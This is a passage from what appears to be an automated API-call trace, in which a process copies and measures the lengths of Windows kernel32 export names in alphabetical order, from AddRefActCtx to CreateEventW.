(in: lpString1=0x3f2ca78, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0078.972] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0078.972] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0078.973] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0078.973] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0078.973] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0078.973] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0078.973] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0078.973] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0078.973] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0078.973] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0078.973] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0078.973] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0078.973] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0078.973] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0078.973] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0078.973] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0078.973] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0078.973] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0078.973] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0078.973] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0078.973] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0078.973] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0078.973] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0078.973] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0078.973] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0078.973] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0078.973] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0078.973] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0078.973] lstrlenA (lpString="BACKUPREAD") returned 10 [0078.973] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0078.973] lstrlenA (lpString="BACKUPSEEK") returned 10 [0078.973] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0078.973] lstrlenA (lpString="BACKUPWRITE") returned 11 [0078.973] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0078.973] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0078.973] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0078.973] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0078.973] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0078.974] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0078.974] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0078.974] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0078.974] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0078.974] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0078.974] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0078.974] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0078.974] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0078.974] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0078.974] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0078.974] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0078.974] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0078.974] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0078.974] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0078.974] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0078.974] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0078.974] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0078.974] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0078.974] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0078.974] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0078.974] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0078.974] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0078.974] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0078.974] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0078.974] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0078.974] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0078.974] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0078.974] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0078.974] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0078.974] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0078.974] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0078.974] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0078.974] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0078.974] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0078.974] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0078.974] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0078.974] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0078.974] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0078.975] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0078.975] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0078.975] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0078.975] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0078.975] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0078.975] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0078.975] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0078.975] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0078.975] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0078.975] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0078.975] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0078.975] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0078.975] lstrlenA (lpString="BEEP") returned 4 [0078.975] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0078.975] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0078.975] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0078.975] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0078.975] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0078.975] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0078.975] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0078.975] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0078.975] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0078.975] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0078.975] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0078.975] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0078.975] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0078.975] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0078.975] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0078.975] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0078.975] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0078.975] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0078.975] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0078.975] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0078.975] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0078.975] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0078.975] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0078.975] lstrlenA (lpString="CANCELIO") returned 8 [0078.976] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0078.976] lstrlenA (lpString="CANCELIOEX") returned 10 [0078.976] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0078.976] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0078.976] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0078.976] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0078.976] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0078.976] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0078.976] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0078.976] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0078.976] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0078.976] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0078.976] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0078.976] lstrlenA (lpString="CHECKELEVATION") returned 14 [0078.976] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0078.976] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0078.976] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0078.976] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0078.976] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0078.976] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0078.976] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0078.976] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0078.976] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0078.976] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0078.976] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0078.976] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0078.976] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0078.976] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0078.976] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0078.976] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0078.976] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0078.976] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0078.976] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0078.976] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0078.976] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0078.976] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0078.977] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0078.977] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0078.977] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0078.977] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0078.977] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0078.977] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0078.977] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0078.977] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0078.977] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0078.977] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0078.977] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0078.977] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0078.977] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0078.977] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0078.977] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0078.977] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0078.977] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0078.977] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0078.977] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0078.977] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0078.977] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0078.977] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0078.977] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0078.977] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0078.977] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0078.977] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0078.977] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0078.977] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0078.977] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0078.977] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0078.977] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0078.977] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0078.977] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0078.977] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0078.977] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0078.977] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0078.977] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0078.978] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0078.978] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0078.978] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0078.978] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0078.978] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0078.978] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0078.978] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0078.978] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0078.978] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0078.978] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0078.978] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0078.978] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0078.978] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0078.978] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0078.978] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0078.978] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0078.978] lstrlenA (lpString="COPYCONTEXT") returned 11 [0078.978] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0078.978] lstrlenA (lpString="COPYFILEA") returned 9 [0078.978] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0078.978] lstrlenA (lpString="COPYFILEEXA") returned 11 [0078.978] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0078.978] lstrlenA (lpString="COPYFILEEXW") returned 11 [0078.978] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0078.978] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0078.978] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0078.978] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0078.978] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0078.978] lstrlenA (lpString="COPYFILEW") returned 9 [0078.978] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0078.978] lstrlenA (lpString="COPYLZFILE") returned 10 [0078.978] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0078.978] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0078.978] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0078.978] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0078.978] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0078.978] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0078.979] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0078.979] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0078.979] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0078.979] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0078.979] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0078.979] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0078.979] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0078.979] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0078.979] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0078.979] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0078.979] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0078.979] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0078.979] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0078.979] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0078.979] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0078.979] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0078.979] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0078.979] lstrlenA (lpString="CREATEEVENTA") returned 12 [0078.979] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0078.979] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0078.979] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0078.979] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0078.979] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventW" | out: lpString1="CreateEventW") 